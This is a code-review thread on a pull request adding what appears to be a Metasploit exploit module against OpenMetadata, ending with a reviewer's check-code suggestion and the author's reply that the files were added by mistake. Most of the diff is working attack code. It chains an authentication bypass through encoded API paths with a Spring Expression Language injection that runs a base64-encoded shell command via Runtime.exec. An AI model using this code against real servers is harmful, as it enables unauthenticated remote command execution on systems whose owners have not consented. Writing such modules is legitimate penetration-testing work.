modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb

```diff
@@ -0,0 +1,134 @@
+            'Automatic',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'rport' => 8585,
+          'FETCH_COMMAND' => 'WGET'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # list of paths that require no authentication
+    unauthed_paths = [
+      '/api/v1;v1%2Fv1%2Fusers%2Flogin',
+      '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
+      '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
+      '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',
+      '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',
+      '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',
+      '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',
+      '/api/v1;v1%2Fv1%2Fusers%2Frefresh',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fversion'
+    ]
+    # $@|sh – Getting a shell environment from Runtime.exec
+    cmd = "sh -c $@|sh . echo #{cmd}"
+    cmd_b64 = Base64.strict_encode64(cmd)
+    spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
+    unauthed_paths.shuffle!.each do |path|
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),
+        'method' => 'GET'
+      })
+      break if res.code == 400 && res.body.include?('EL1001E')
+    end
+  end
+
+  def check
+    print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata')
+
+    # try to dectect version
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'),
+      'method' => 'GET'
+    })
+    return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    unless res_json.blank?
+      version = res_json['version']
+      version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?
+    end
+    return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?
+    return CheckCode::Vulnerable("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
```

Comment:
```suggestion
    return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
```
for passive checks such as getting the version umber it should be `CheckCode::Appears`
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

Reply:
Sorry, my fault. These files should not be there and are removed. 
See https://github.com/rapid7/metasploit-framework/pull/19368/commits/c7a74f4a5a188f8804229b936524e38a19ec7973